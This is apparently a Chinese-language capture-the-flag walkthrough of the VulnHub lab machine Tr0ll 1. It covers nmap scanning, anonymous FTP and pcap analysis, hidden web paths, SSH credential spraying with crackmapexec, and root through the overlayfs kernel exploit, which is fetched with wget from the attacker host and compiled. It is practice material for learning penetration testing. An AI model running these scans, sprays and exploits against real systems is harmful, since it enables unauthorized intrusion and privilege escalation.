Tr0ll: 1

https://www.vulnhub.com/entry/tr0ll-1,100/

主机发现端口扫描

探测存活主机，154为靶机

nmap -sP 192.168.75.0/24
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-27 08:50 CST
Nmap scan report for 192.168.75.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00032s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.154
Host is up (0.00033s latency).
MAC Address: 00:0C:29:39:E9:62 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.000079s latency).
MAC Address: 00:50:56:FB:E7:F4 (VMware)
Nmap scan report for 192.168.75.151
Host is up.

扫描主机所有端口

nmap -sT -min-rate 10000 -p- 192.168.75.154
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-27 08:50 CST
Nmap scan report for 192.168.75.154
Host is up (0.0018s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:39:E9:62 (VMware

扫描服务版本及系统版本

nmap -sT -sV -O -p21,22,80 192.168.75.154
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-27 08:51 CST
Nmap scan report for 192.168.75.154
Host is up (0.0026s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:39:E9:62 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

扫描漏洞

nmap -script=vuln -p21,22,80 192.168.75.154
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-27 08:52 CST
Nmap scan report for 192.168.75.154
Host is up (0.00081s latency).

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /robots.txt: Robots file
|_  /secret/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:39:E9:62 (VMware)

FTP

使用匿名用户登录
存在一个pcap文件，使用wireshark打开，观察此文件

应该是存在一个secret_stuff.txt文件

找到传输secret_stuff.txt 的数据包，能看到明文内容

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol
Sucks, you were so close... gotta TRY HARDER!

信息：sup3rs3cr3tdirlol 可能很重要

web渗透

访问主页

翻译过来是：嘿，非hacker。问题？
FTP获取到的信息 sup3rs3cr3tdirlol 尝试访问 /sup3rs3cr3tdirlol 存在文件roflmao，下载下载

使用notepad打开提示：Find address 0x0856BF to proceed ，文件头是elf文件，是linux下的可执行文件

使用010Editor找不到这个地址，尝试在url操作，访问成功 6
来到/0x0856BF ，存在几个文本文件
```
## /good_luck/which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
```
```
##/this_folder_contains_the_password/Pass.txt
Good_job_:)
```
是账号密码，靶机扫描出了22端口，所以应该尝试ssh登录，但是web上还有一些让人感兴趣的路径没访问（别访问了，给你来一句 U MAD？）
尝试SSH登录

我一个一个试没事出来，别学我可以使用命令
```
crackmapexec ssh 192.168.75.154 -u which_one_lol.txt -p Pass.txt --continue-on-success 
```
依旧没破解出来，密码真的是Good_job_:)吗？有没有可能是Pass.txt

overflow + Pass.txt 成功登录

提权

查看权限

$ whoami
overflow
//
$ sudo -
[sudo] password for overflow: 
Sorry, user overflow may not run sudo on troll.
//
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:0c:29:39:e9:62 brd ff:ff:ff:ff:ff:ff
    inet 192.168.75.154/24 brd 192.168.75.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe39:e962/64 scope link 
       valid_lft forever preferred_lft forever
//
$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux

不一会root给我踢出来了，感觉有定时任务，但我没找到，因为不给访问

Broadcast Message from root@trol                                               
        (somewhere) at 19:15 ...                                               
                                                                               
TIMES UP LOL!                                                                  
                                                                               
Connection to 192.168.75.154 closed by remote host.
Connection to 192.168.75.154 closed.

别的方法尝试了，最后尝试内核漏洞

searchsploit 3.13.0    
//
----------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                           |  Path
----------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privileg | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privileg | linux/local/37293.txt
Unified Remote 3.13.0 - Remote Code Execution (RCE)                                      | windows/remote/51309.py
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

将37292.c拉取下来，然后打开服务器方便靶机下载

cd /tmp
wget http://192.168.75.151/37292.c
gcc 37292.c -o 37292  
./37292

获得root

whoami
root

思路

直接讲提权，登陆一会被root弹出去肯定是存在crontab定时任务的，但是因为我cat /etc/crontab被权限拒绝后就停止这个思路了，查看红队笔记WP，寻找cronlog这种模糊字样最后找到定时任务，最后追加反弹shell代码即可

Vulnhub - Tr0ll 1